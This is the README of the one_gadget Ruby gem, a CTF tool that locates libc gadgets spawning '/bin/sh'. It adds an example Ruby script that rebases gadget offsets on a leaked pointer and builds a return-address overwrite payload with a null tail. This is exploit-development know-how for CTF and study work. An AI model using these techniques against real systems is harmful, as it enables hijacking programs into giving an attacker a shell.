# One Gadget

When playing CTF pwn challenges we usually need a one-gadget: a single address inside libc that, when execution is redirected to it, calls `execve('/bin/sh', NULL, NULL)`.

This gem provides such a gadget finder, so there is no need to open IDA Pro every time. It also provides the command-line tool `one_gadget` for easy usage.

Every gadget comes with constraints (registers or stack slots that must be NULL when control reaches it). A gadget only spawns a shell if those constraints hold at the moment you jump to it, so check them against your exploit's state instead of trying the first offset blindly.

Note: supports amd64 and i386!

Note2: still work in progress, the gem version might update frequently :p.
## Install

Available on RubyGems.org!

```shell
gem install one_gadget
```
## Usage

### Command Line Tool

```shell
one_gadget
# Usage: one_gadget [file] [options]
#     -b, --build-id BuildID           BuildID[sha1] of libc.
#     -f, --[no-]force-file            Force search gadgets in file instead of build id first.
#     -r, --[no-]raw                   Output gadgets offset only, split with one space.
#     -s, --script exploit-script      Run exploit script with all possible gadgets.
#                                      The script will be run as 'exploit-script $offset'.
```
With `-b`, the gadgets are looked up by the libc's build id (the `NT_GNU_BUILD_ID` note, e.g. from `readelf -n libc.so.6`), so you can query a remote target's libc without having the file at hand. If the build id is not known to the gem, pass the libc file instead (or add `-f` to skip the build-id lookup):

```shell
one_gadget -b 60131540dadc6796cab33388349e6e4e68692053
# offset: 0x4526a
# constraints:
#   [rsp+0x30] == NULL
#
# offset: 0xef6c4
# constraints:
#   [rsp+0x50] == NULL
#
# offset: 0xf0567
# constraints:
#   [rsp+0x70] == NULL
#
# offset: 0xf5b10
# constraints:
#   [rbp-0xf8] == NULL
#   rcx == NULL
```
Or search a libc file directly (an i386 libc here):

```shell
one_gadget /lib/i386-linux-gnu/libc.so.6
# offset: 0x3ac69
# constraints:
#   esi is the address of `rw-p` area of libc
#   [esp+0x34] == NULL
#
# offset: 0x5fbbe
# constraints:
#   esi is the address of `rw-p` area of libc
#   eax == NULL
#
# offset: 0x12036c
# constraints:
#   esi is the address of `rw-p` area of libc
#   eax == NULL
```
### Combine with exploit script

Pass your exploit script with `-s`; `one_gadget` then runs it once per candidate gadget, as `exploit-script $offset`, so you don't need to try every possible gadget manually. Your script should read the offset from its first argument, add it to the leaked libc base, and attempt the exploit with that address.

```shell
one_gadget ./spec/data/libc-2.19.so -s 'echo "offset ->"'
```
### Directly use in script

```ruby
require 'one_gadget'
OneGadget.gadgets(file: '/lib/x86_64-linux-gnu/libc.so.6')
# => [283242, 980676, 984423, 1006352]
```

The return value is an array of gadget offsets, as decimal integers relative to the libc base; `283242` is `0x4526a`, the first gadget in the `-b` output above, and the rest match in the same order.
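The offsets are only half of the job: they still have to be rebased on a leaked libc address, and the gadget's constraints have to hold when the `ret` lands on it. The following script is an added example, not part of the one_gadget gem. It takes offsets either from `OneGadget.gadgets` or, when launched through `one_gadget -s ./this.rb`, from `ARGV[0]`, computes absolute addresses from a leaked `puts` pointer, and builds a return-address overwrite whose null tail satisfies `[rsp+N] == NULL` constraints. `PUTS_OFFSET`, `RET_ADDR_PADDING`, the leaked address and the fallback gadget offsets are constructed for the example, not measured from any real binary.

```ruby
# Added example, not part of the one_gadget gem: rebase gadget offsets on a
# leaked libc address and build a payload whose stack tail satisfies
# `[rsp+N] == NULL` style constraints.
#
# Constructed assumptions (not measured from any real binary):
#   PUTS_OFFSET            hypothetical offset of puts inside the target libc
#   SAMPLE_GADGET_OFFSETS  the offsets the README shows for the amd64 libc
#   RET_ADDR_PADDING       hypothetical distance from buffer start to saved RIP

begin
  require 'one_gadget'
rescue LoadError
  # gem not installed: gadget_offsets falls back to the constructed sample
end

SAMPLE_GADGET_OFFSETS = [283242, 980676, 984423, 1006352].freeze
PUTS_OFFSET = 0x6f690
RET_ADDR_PADDING = 40

# Gadget offsets from the gem when it and the libc file are present,
# otherwise the constructed sample so the script runs stand-alone.
def gadget_offsets(libc_path)
  return SAMPLE_GADGET_OFFSETS unless defined?(OneGadget) && File.exist?(libc_path)

  OneGadget.gadgets(file: libc_path)
end

# libc base from a leaked symbol address. A base that is not page aligned
# means the leak or the symbol offset is wrong, so fail here instead of
# crashing the target with a bogus gadget address.
def libc_base(leaked_addr, symbol_offset)
  base = leaked_addr - symbol_offset
  raise ArgumentError, format('base 0x%x is not page aligned', base) unless (base & 0xfff).zero?

  base
end

# Absolute gadget addresses for the running process.
def rebase_gadgets(base, offsets)
  offsets.map { |off| base + off }
end

# Little-endian 64-bit, as the value sits on the stack.
def p64(value)
  [value].pack('Q<')
end

# Overwrite saved RIP with the gadget and follow it with null bytes. After the
# `ret`, rsp points just past the return slot, so those zeros are exactly what
# constraints like `[rsp+0x30] == NULL` read. Register and rbp-relative
# constraints (`rcx == NULL`, `[rbp-0xf8] == NULL`) are not covered by this trick.
def build_payload(padding_len, gadget_addr, null_tail: 0x100)
  ('A' * padding_len).b + p64(gadget_addr) + ("\x00" * null_tail).b
end

# Does the payload zero the 8-byte slot at [rsp+displacement] after the ret?
def stack_slot_null?(payload, padding_len, displacement)
  slot = payload.byteslice(padding_len + 8 + displacement, 8)
  !slot.nil? && slot.bytesize == 8 && slot.bytes.all?(&:zero?)
end

if __FILE__ == $PROGRAM_NAME
  # Under `one_gadget -s ./this.rb` the offset arrives as ARGV[0];
  # stand-alone we walk the sample list.
  offsets = ARGV.empty? ? SAMPLE_GADGET_OFFSETS : [Integer(ARGV[0])]
  leaked_puts = 0x7ffff7a5b690 # constructed leak value
  base = libc_base(leaked_puts, PUTS_OFFSET)
  rebase_gadgets(base, offsets).each do |addr|
    payload = build_payload(RET_ADDR_PADDING, addr)
    ok = stack_slot_null?(payload, RET_ADDR_PADDING, 0x30)
    puts format('gadget 0x%x: %d-byte payload, [rsp+0x30] == NULL: %s', addr, payload.bytesize, ok)
  end
end
```

The null tail only helps with stack-relative constraints; for the `rcx == NULL` or `esi is the address of rw-p area` cases you need to reach the gadget through a path that leaves those registers in the required state, which is why it pays to look at every gadget's constraints rather than only the first offset.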